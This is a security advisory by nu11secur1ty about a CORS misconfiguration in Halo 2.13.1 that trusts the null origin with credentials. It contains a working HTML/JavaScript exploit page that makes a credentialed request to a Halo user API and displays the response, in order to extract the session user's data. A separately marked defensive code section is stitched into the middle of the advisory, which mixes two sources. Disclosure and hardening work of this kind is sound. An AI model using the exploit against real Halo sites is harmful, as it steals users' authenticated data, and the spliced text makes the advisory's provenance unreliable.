HALO 2.13.1 CORS Issue

HALO version 2.13.1 has an insecure cross-origin resource sharing setting that allows an arbitrary origin.

Packet Storm

Title: HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted

Author: nu11secur1ty

Date: 03/15/2024

Vendor: https://www.halo.run/

Software: https://github.com/halo-dev/halo

Reference: https://portswigger.net/web-security/cors

Description:

The application implements an HTML5 cross-origin resource sharing
(CORS) policy for this request that allows access from any domain.
The application allowed access from the requested origin null, and it
allows two-way interaction from the null origin. This effectively means
that any domain can perform two-way interaction by causing the browser
to submit the null origin, for example by issuing the request from a
sandboxed iframe or a malicious phishing domain with a specially crafted
HTML exploit.

STATUS: HIGH - Vulnerability

[+]Exploit:

<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>

<div id="demo">
<button type="button" onclick="cors()">Exploit Click here</button>
</div>

<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // Show the cross-origin response; the original assigned the return
      // value of alert() (undefined) to innerHTML, which blanked the div.
      alert(this.responseText);
      document.getElementById("demo").innerText = this.responseText;
    }
  };
  xhttp.open("GET",
    "http://192.168.100.49:8090/apis/api.console.halo.run/v1alpha1/users/-",
    true);
  xhttp.withCredentials = true; // credentialed request: cookies are included
  xhttp.send();
}
</script>
</center>
</body>
</html>
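The following is an added example and is not code from the advisory or from the Halo project. It shows, from the defender's side, how to classify the CORS headers a server returns for a given request Origin (so the "null origin echoed with credentials" condition described above can be detected in an audit), and a hardened header builder that reflects only an explicit allowlist and never trusts "null". The allowlist, the origins and the header values are constructed sample data.

```javascript
// Added example (not part of the original advisory or the Halo code base).
const TRUSTED_ORIGINS = ["https://admin.example.com"]; // assumed allowlist

// Constructed sample of the condition the advisory describes: the server
// echoes the "null" origin back and allows credentials, so any page that
// makes the browser send "Origin: null" can read the authenticated response.
const SAMPLE_VULNERABLE_RESPONSE = {
  "Access-Control-Allow-Origin": "null",
  "Access-Control-Allow-Credentials": "true",
  "Content-Type": "application/json",
};

// Audit the CORS headers returned for one request Origin. Returns a risk class:
//   "none"           no ACAO header: the browser blocks cross-origin reads
//   "public"         "*" without credentials: readable, but cookies not sent
//   "wildcard-creds" "*" with credentials: invalid, browsers refuse it
//   "reflect-creds"  request origin (including "null") echoed back with
//                    credentials: authenticated data is readable cross-origin
//   "reflect"        request origin echoed back without credentials
//   "fixed"          a fixed origin different from the request's: harmless
// A "reflect-creds" verdict is a finding only when the origin under test is
// one the server should not trust, so audit with "null" or an origin you own.
function classifyCors(requestOrigin, headers) {
  const h = {};
  for (const [name, value] of Object.entries(headers)) {
    h[name.toLowerCase()] = String(value).trim();
  }
  const acao = h["access-control-allow-origin"];
  const creds =
    (h["access-control-allow-credentials"] || "").toLowerCase() === "true";
  if (acao === undefined) return "none";
  if (acao === "*") return creds ? "wildcard-creds" : "public";
  if (acao === requestOrigin) return creds ? "reflect-creds" : "reflect";
  return "fixed";
}

// Hardened header builder. CORS headers are emitted only for an exact
// allowlist match; "null" (sandboxed iframes, file:// pages, some redirects)
// and unknown origins get no CORS headers at all, so the same-origin policy
// applies. "Vary: Origin" stops caches from serving one origin's headers to
// another.
function corsHeadersFor(requestOrigin, allowlist) {
  if (
    !requestOrigin ||
    requestOrigin === "null" ||
    !allowlist.includes(requestOrigin)
  ) {
    return {};
  }
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Run the audit against the constructed vulnerable response and against the
// hardened builder for a null, an unknown and an allowlisted origin.
function demo() {
  return {
    vulnerable: classifyCors("null", SAMPLE_VULNERABLE_RESPONSE),
    hardenedNull: classifyCors("null", corsHeadersFor("null", TRUSTED_ORIGINS)),
    hardenedUnknown: classifyCors(
      "https://attacker.example",
      corsHeadersFor("https://attacker.example", TRUSTED_ORIGINS)
    ),
    hardenedTrusted: classifyCors(
      "https://admin.example.com",
      corsHeadersFor("https://admin.example.com", TRUSTED_ORIGINS)
    ),
  };
}

console.log(demo());
// { vulnerable: 'reflect-creds', hardenedNull: 'none',
//   hardenedUnknown: 'none', hardenedTrusted: 'reflect-creds' }
```

The audit helper works on captured response headers, so it can be run against stored proxy logs without touching the server; the only origins that should ever produce "reflect-creds" are the ones in the allowlist.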

Reproduce:

href

Proof and Exploit:

href

Time spent:

00:25:00


System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty http://nu11secur1ty.com/
